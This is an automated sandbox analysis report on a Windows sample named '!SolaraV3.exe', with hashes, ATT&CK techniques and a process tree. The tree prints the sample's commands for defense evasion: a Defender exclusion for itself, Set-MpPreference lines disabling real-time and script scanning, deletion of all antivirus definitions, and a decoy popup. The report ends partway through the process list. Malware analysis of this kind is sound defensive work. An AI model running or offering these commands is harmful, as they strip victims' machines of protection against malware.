6f722a19a4b6ce08194823f304f49d31b04fa5d9f609f5dde0ff63bbf307f040

Analysis

max time kernel
149s
max time network
147s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
29/09/2024, 14:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

!SolaraV3.exe
Size

7.5MB
MD5

031a05dc463314df4904b6aab7abb56d
SHA1

d98f758b0126cc2bbfc59d38b23f59ebc8e21c18
SHA256

6f722a19a4b6ce08194823f304f49d31b04fa5d9f609f5dde0ff63bbf307f040
SHA512

974fb85323cc907c327f46ccb0d8bd27348aa049dbfc7f4497906d2daf2dd87602a4f662d5a7a5040b21d833aff315a835b9d4ae11106581d8b0b3e549b7577f
SSDEEP

196608:Tp8wQurErvI9pWjg/Qc+4o673pNrabePNNrStMXWTNJb:IurEUWjZZ4dDLIeF1StYwNJb

Score

10^/10

discovery evasion execution upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
96	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3148	powershell.exe
4496	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe
4916	!SolaraV3.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
4992	tasklist.exe

UPX packed file 51 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001ac60-21.dat	upx
behavioral1/memory/4916-25-0x00007FFC94EF0000-0x00007FFC955B5000-memory.dmp	upx
behavioral1/files/0x000700000001ac53-27.dat	upx
behavioral1/files/0x000700000001ac5e-30.dat	upx
behavioral1/memory/4916-32-0x00007FFCA9C10000-0x00007FFCA9C1F000-memory.dmp	upx
behavioral1/memory/4916-29-0x00007FFCA90E0000-0x00007FFCA9105000-memory.dmp	upx
behavioral1/files/0x000700000001ac5d-34.dat	upx
behavioral1/files/0x000700000001ac5f-35.dat	upx
behavioral1/files/0x000700000001ac5a-48.dat	upx
behavioral1/files/0x000700000001ac59-47.dat	upx
behavioral1/files/0x000700000001ac58-46.dat	upx
behavioral1/files/0x000700000001ac57-45.dat	upx
behavioral1/files/0x000700000001ac56-44.dat	upx
behavioral1/files/0x000700000001ac55-43.dat	upx
behavioral1/files/0x000700000001ac54-42.dat	upx
behavioral1/files/0x000800000001ac52-41.dat	upx
behavioral1/files/0x000700000001ac65-40.dat	upx
behavioral1/files/0x000700000001ac64-39.dat	upx
behavioral1/files/0x000700000001ac63-38.dat	upx
behavioral1/memory/4916-54-0x00007FFCA90B0000-0x00007FFCA90DD000-memory.dmp	upx
behavioral1/memory/4916-56-0x00007FFCA9070000-0x00007FFCA908A000-memory.dmp	upx
behavioral1/memory/4916-58-0x00007FFCA9040000-0x00007FFCA9064000-memory.dmp	upx
behavioral1/memory/4916-60-0x00007FFCA5260000-0x00007FFCA53DF000-memory.dmp	upx
behavioral1/memory/4916-62-0x00007FFCA5240000-0x00007FFCA5259000-memory.dmp	upx
behavioral1/memory/4916-64-0x00007FFCA5230000-0x00007FFCA523D000-memory.dmp	upx
behavioral1/memory/4916-66-0x00007FFCA4BA0000-0x00007FFCA4BD3000-memory.dmp	upx
behavioral1/memory/4916-71-0x00007FFCA4920000-0x00007FFCA49ED000-memory.dmp	upx
behavioral1/memory/4916-70-0x00007FFC94EF0000-0x00007FFC955B5000-memory.dmp	upx
behavioral1/memory/4916-74-0x00007FFCA90E0000-0x00007FFCA9105000-memory.dmp	upx
behavioral1/memory/4916-73-0x00007FFC949C0000-0x00007FFC94EE9000-memory.dmp	upx
behavioral1/memory/4916-77-0x00007FFCA5210000-0x00007FFCA5224000-memory.dmp	upx
behavioral1/memory/4916-76-0x00007FFCA9C10000-0x00007FFCA9C1F000-memory.dmp	upx
behavioral1/memory/4916-80-0x00007FFCA5120000-0x00007FFCA512D000-memory.dmp	upx
behavioral1/memory/4916-79-0x00007FFCA90B0000-0x00007FFCA90DD000-memory.dmp	upx
behavioral1/memory/4916-82-0x00007FFCA9070000-0x00007FFCA908A000-memory.dmp	upx
behavioral1/memory/4916-83-0x00007FFCA3DF0000-0x00007FFCA3F0A000-memory.dmp	upx
behavioral1/memory/4916-197-0x00007FFCA5210000-0x00007FFCA5224000-memory.dmp	upx
behavioral1/memory/4916-185-0x00007FFC94EF0000-0x00007FFC955B5000-memory.dmp	upx
behavioral1/memory/4916-205-0x00007FFCA9040000-0x00007FFCA9064000-memory.dmp	upx
behavioral1/memory/4916-204-0x00007FFCA9070000-0x00007FFCA908A000-memory.dmp	upx
behavioral1/memory/4916-203-0x00007FFCA90B0000-0x00007FFCA90DD000-memory.dmp	upx
behavioral1/memory/4916-202-0x00007FFCA9C10000-0x00007FFCA9C1F000-memory.dmp	upx
behavioral1/memory/4916-201-0x00007FFCA90E0000-0x00007FFCA9105000-memory.dmp	upx
behavioral1/memory/4916-200-0x00007FFC949C0000-0x00007FFC94EE9000-memory.dmp	upx
behavioral1/memory/4916-199-0x00007FFCA3DF0000-0x00007FFCA3F0A000-memory.dmp	upx
behavioral1/memory/4916-198-0x00007FFCA5120000-0x00007FFCA512D000-memory.dmp	upx
behavioral1/memory/4916-195-0x00007FFCA4920000-0x00007FFCA49ED000-memory.dmp	upx
behavioral1/memory/4916-194-0x00007FFCA4BA0000-0x00007FFCA4BD3000-memory.dmp	upx
behavioral1/memory/4916-193-0x00007FFCA5230000-0x00007FFCA523D000-memory.dmp	upx
behavioral1/memory/4916-192-0x00007FFCA5240000-0x00007FFCA5259000-memory.dmp	upx
behavioral1/memory/4916-191-0x00007FFCA5260000-0x00007FFCA53DF000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\LowRegistry\Shell Extensions\Cached	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\LowRegistry	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\LowRegistry\Shell Extensions	PaintStudio.View.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133720941997774647"	chrome.exe

Modifies registry class 12 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content	PaintStudio.View.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	PaintStudio.View.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "51200"	PaintStudio.View.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History	PaintStudio.View.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	PaintStudio.View.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	PaintStudio.View.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	PaintStudio.View.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
3124	PaintStudio.View.exe
4144	WINWORD.EXE
4144	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
4496	powershell.exe
4496	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
4496	powershell.exe
4496	powershell.exe
3148	powershell.exe
1496	mspaint.exe
1496	mspaint.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3124	PaintStudio.View.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4992	tasklist.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	3148	powershell.exe
Token: SeIncreaseQuotaPrivilege	4252	WMIC.exe
Token: SeSecurityPrivilege	4252	WMIC.exe
Token: SeTakeOwnershipPrivilege	4252	WMIC.exe
Token: SeLoadDriverPrivilege	4252	WMIC.exe
Token: SeSystemProfilePrivilege	4252	WMIC.exe
Token: SeSystemtimePrivilege	4252	WMIC.exe
Token: SeProfSingleProcessPrivilege	4252	WMIC.exe
Token: SeIncBasePriorityPrivilege	4252	WMIC.exe
Token: SeCreatePagefilePrivilege	4252	WMIC.exe
Token: SeBackupPrivilege	4252	WMIC.exe
Token: SeRestorePrivilege	4252	WMIC.exe
Token: SeShutdownPrivilege	4252	WMIC.exe
Token: SeDebugPrivilege	4252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4252	WMIC.exe
Token: SeRemoteShutdownPrivilege	4252	WMIC.exe
Token: SeUndockPrivilege	4252	WMIC.exe
Token: SeManageVolumePrivilege	4252	WMIC.exe
Token: 33	4252	WMIC.exe
Token: 34	4252	WMIC.exe
Token: 35	4252	WMIC.exe
Token: 36	4252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4252	WMIC.exe
Token: SeSecurityPrivilege	4252	WMIC.exe
Token: SeTakeOwnershipPrivilege	4252	WMIC.exe
Token: SeLoadDriverPrivilege	4252	WMIC.exe
Token: SeSystemProfilePrivilege	4252	WMIC.exe
Token: SeSystemtimePrivilege	4252	WMIC.exe
Token: SeProfSingleProcessPrivilege	4252	WMIC.exe
Token: SeIncBasePriorityPrivilege	4252	WMIC.exe
Token: SeCreatePagefilePrivilege	4252	WMIC.exe
Token: SeBackupPrivilege	4252	WMIC.exe
Token: SeRestorePrivilege	4252	WMIC.exe
Token: SeShutdownPrivilege	4252	WMIC.exe
Token: SeDebugPrivilege	4252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4252	WMIC.exe
Token: SeRemoteShutdownPrivilege	4252	WMIC.exe
Token: SeUndockPrivilege	4252	WMIC.exe
Token: SeManageVolumePrivilege	4252	WMIC.exe
Token: 33	4252	WMIC.exe
Token: 34	4252	WMIC.exe
Token: 35	4252	WMIC.exe
Token: 36	4252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4496	powershell.exe
Token: SeSecurityPrivilege	4496	powershell.exe
Token: SeTakeOwnershipPrivilege	4496	powershell.exe
Token: SeLoadDriverPrivilege	4496	powershell.exe
Token: SeSystemProfilePrivilege	4496	powershell.exe
Token: SeSystemtimePrivilege	4496	powershell.exe
Token: SeProfSingleProcessPrivilege	4496	powershell.exe
Token: SeIncBasePriorityPrivilege	4496	powershell.exe
Token: SeCreatePagefilePrivilege	4496	powershell.exe
Token: SeBackupPrivilege	4496	powershell.exe
Token: SeRestorePrivilege	4496	powershell.exe
Token: SeShutdownPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeSystemEnvironmentPrivilege	4496	powershell.exe
Token: SeRemoteShutdownPrivilege	4496	powershell.exe
Token: SeUndockPrivilege	4496	powershell.exe
Token: SeManageVolumePrivilege	4496	powershell.exe
Token: 33	4496	powershell.exe
Token: 34	4496	powershell.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
2504	mshta.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe
1188	chrome.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
1496	mspaint.exe
3124	PaintStudio.View.exe
3124	PaintStudio.View.exe
4144	WINWORD.EXE
4144	WINWORD.EXE
4144	WINWORD.EXE
4144	WINWORD.EXE
4144	WINWORD.EXE
4144	WINWORD.EXE
4144	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3692 wrote to memory of 4916	3692	!SolaraV3.exe	74
PID 3692 wrote to memory of 4916	3692	!SolaraV3.exe	74
PID 4916 wrote to memory of 4472	4916	!SolaraV3.exe	75
PID 4916 wrote to memory of 4472	4916	!SolaraV3.exe	75
PID 4916 wrote to memory of 2836	4916	!SolaraV3.exe	76
PID 4916 wrote to memory of 2836	4916	!SolaraV3.exe	76
PID 4916 wrote to memory of 1668	4916	!SolaraV3.exe	77
PID 4916 wrote to memory of 1668	4916	!SolaraV3.exe	77
PID 4916 wrote to memory of 2408	4916	!SolaraV3.exe	79
PID 4916 wrote to memory of 2408	4916	!SolaraV3.exe	79
PID 4916 wrote to memory of 2312	4916	!SolaraV3.exe	83
PID 4916 wrote to memory of 2312	4916	!SolaraV3.exe	83
PID 2408 wrote to memory of 4992	2408	cmd.exe	85
PID 2408 wrote to memory of 4992	2408	cmd.exe	85
PID 1668 wrote to memory of 2504	1668	cmd.exe	86
PID 1668 wrote to memory of 2504	1668	cmd.exe	86
PID 4472 wrote to memory of 4496	4472	cmd.exe	87
PID 4472 wrote to memory of 4496	4472	cmd.exe	87
PID 2836 wrote to memory of 3148	2836	cmd.exe	88
PID 2836 wrote to memory of 3148	2836	cmd.exe	88
PID 2312 wrote to memory of 4252	2312	cmd.exe	89
PID 2312 wrote to memory of 4252	2312	cmd.exe	89
PID 2836 wrote to memory of 96	2836	cmd.exe	92
PID 2836 wrote to memory of 96	2836	cmd.exe	92
PID 1188 wrote to memory of 1560	1188	chrome.exe	106
PID 1188 wrote to memory of 1560	1188	chrome.exe	106
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107
PID 1188 wrote to memory of 60	1188	chrome.exe	107

C:\Users\Admin\AppData\Local\Temp\!SolaraV3.exe
"C:\Users\Admin\AppData\Local\Temp\!SolaraV3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3692
- C:\Users\Admin\AppData\Local\Temp\!SolaraV3.exe
  "C:\Users\Admin\AppData\Local\Temp\!SolaraV3.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\!SolaraV3.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\!SolaraV3.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3148
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:96
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Reach out to engine provider for most recent and up to date file of the engine', 0, 'Roblox has updated whilst engine has not.', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1668
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Reach out to engine provider for most recent and up to date file of the engine', 0, 'Roblox has updated whilst engine has not.', 0+16);close()"
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2408
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4252

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\InitializeNew.png" /ForceBootstrapPaint3D
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1496

C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
"C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe" -ServerName:Microsoft.MSPaint.AppX437q68k2qc2asvaagas2prv9tjej6ja9.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3124

C:\Program Files\Windows Mail\wab.exe
"C:\Program Files\Windows Mail\wab.exe" /contact "C:\Users\Admin\Desktop\JoinUnblock.contact"
1⤵
PID:932

C:\Program Files\Windows Mail\wab.exe
"C:\Program Files\Windows Mail\wab.exe" /contact "C:\Users\Admin\Desktop\TestImport.contact"
1⤵
PID:428

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\ExportDebug.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc936d9758,0x7ffc936d9768,0x7ffc936d9778
  2⤵
  PID:1560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1884,i,2127223808628026611,12996611333434915002,131072 /prefetch:2
  2⤵
  PID:60
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1820 --field-trial-handle=1884,i,2127223808628026611,12996611333434915002,131072 /prefetch:8
  2⤵
  PID:1904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2092 --field-trial-handle=1884,i,2127223808628026611,12996611333434915002,131072 /prefetch:8
  2⤵
  PID:916
- C:\Program Files\Google\Chrome\Application\chrome.exe
